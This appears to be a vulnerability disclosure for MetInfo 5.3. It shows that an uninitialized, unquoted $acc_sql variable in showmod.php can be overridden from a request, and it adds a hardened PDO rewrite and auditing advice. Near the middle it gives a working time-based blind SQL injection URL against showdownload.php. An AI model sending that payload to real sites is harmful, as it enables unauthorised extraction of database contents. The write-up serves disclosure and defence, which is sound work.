Found in MetInfo5.3/include/global/showmod.php:
```php
if($dataoptimize[$pagemark]['nextlist']){
    if($met_pnorder==1){
        $csql="class1='$class1' and class2='$class2' and class3='$class3'";
        $cpnorder=$class3?$class_list[$class3]['list_order']:($class2?$class_list[$class2]['list_order']:$class_list[$class1]['list_order']);
    } else{
        $csql="class1='$class1'";
        $cpnorder=$class_list[$class1]['list_order'];
    }
    $acc_sql=$met_member_use==2?"(access<='$metinfo_member_type') and":"";
    $pn_sql=pn_order($cpnorder,$news);
    if($cpnorder<4){
        // $acc_sql is concatenated into the statement unquoted (see the note below)
        $allnews=$db->get_all("select * from $dbname where $csql and lang='$lang' and (recycle='0' or recycle='-1') and $acc_sql $pn_sql[2]");
        $allnum=count($allnews);
        if($allnum>1){
            foreach($allnews as $keyall=>$valall){
                if($valall['id']==$id){
                    if(is_array($allnews[$keyall-1])){ if($keyall-1>=0){$prenews=$allnews[$keyall-1];} }
                    if(is_array($allnews[$keyall+1])){ if($keyall+1<=$allnum){$nextnews=$allnews[$keyall+1];} }
                }
            }
        }
    }
}
// (the original excerpt ends here; closing braces added for readability)
```
`$acc_sql` is not initialized and is not wrapped in single quotes, so it can be overridden and used for injection.

Once execution enters this step, `if($met_pnorder==1){ $csql="class1='$class1' and class2='$class2' and class3='$class3'"; $cpnorder=$class3?$class_list[$class3]['list_order']:($class2?$class_list[$class2]['list_order']:$class_list[$class1]['list_order']); }`, the override takes effect.

Look at the database log:

The characters are carried into the query successfully. Constructing the exploit:
**.**.**.**/MetInfo5.3/download/showdownload.php?id=1&acc_sql=aaaa or if(ascii(mid(user(),1,1))=114,benchmark(10000000,md5(2)),1)%23
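The hardened form of the query above, as an added example that is not MetInfo's own code: every SQL fragment is assigned unconditionally before use, the access restriction becomes a bound parameter, and the table name comes from a fixed map (PDO is assumed; the table and column values are placeholders).

```php
<?php
// Added hardening example, not MetInfo's own code. Assumes a PDO connection;
// table names, class and lang values are placeholders chosen for illustration.

function fetchNeighborList(PDO $db, string $tableKey, int $class1,
                           string $lang, int $metMemberUse, int $memberType): array
{
    // 1. A table name cannot be a bound parameter, so it is resolved through a
    //    fixed map rather than taken from any variable a request could populate.
    $tables = ['news' => 'example_news', 'download' => 'example_download'];
    if (!isset($tables[$tableKey])) {
        throw new InvalidArgumentException("unknown table key: $tableKey");
    }
    $table = $tables[$tableKey];

    // 2. Every fragment that reaches the query is assigned here, unconditionally,
    //    so nothing imported from $_GET/$_POST can pre-populate it.
    $conds  = ["class1 = :class1", "lang = :lang", "(recycle = '0' or recycle = '-1')"];
    $params = [':class1' => $class1, ':lang' => $lang];

    // 3. The member-access restriction travels as a bound parameter instead of
    //    an interpolated string fragment like the original $acc_sql.
    if ($metMemberUse === 2) {
        $conds[]                = 'access <= :member_type';
        $params[':member_type'] = $memberType;
    }

    $sql  = "select * from $table where " . implode(' and ', $conds) . " order by id";
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage (constructed): an in-memory SQLite database standing in for MySQL.
$db = new PDO('sqlite::memory:');
$db->exec("create table example_news (id integer primary key, class1 int, lang text, recycle text, access int)");
$db->exec("insert into example_news values (1, 2, 'cn', '0', 0), (2, 2, 'cn', '0', 5)");
$rows = fetchNeighborList($db, 'news', 2, 'cn', 2, 1);
echo count($rows), "\n"; // 1: the row with access=5 is filtered out by the bound parameter
```

When auditing for this class of bug, any variable that is interpolated into SQL but assigned only on some branches, or not at all before use, is a candidate for the same override.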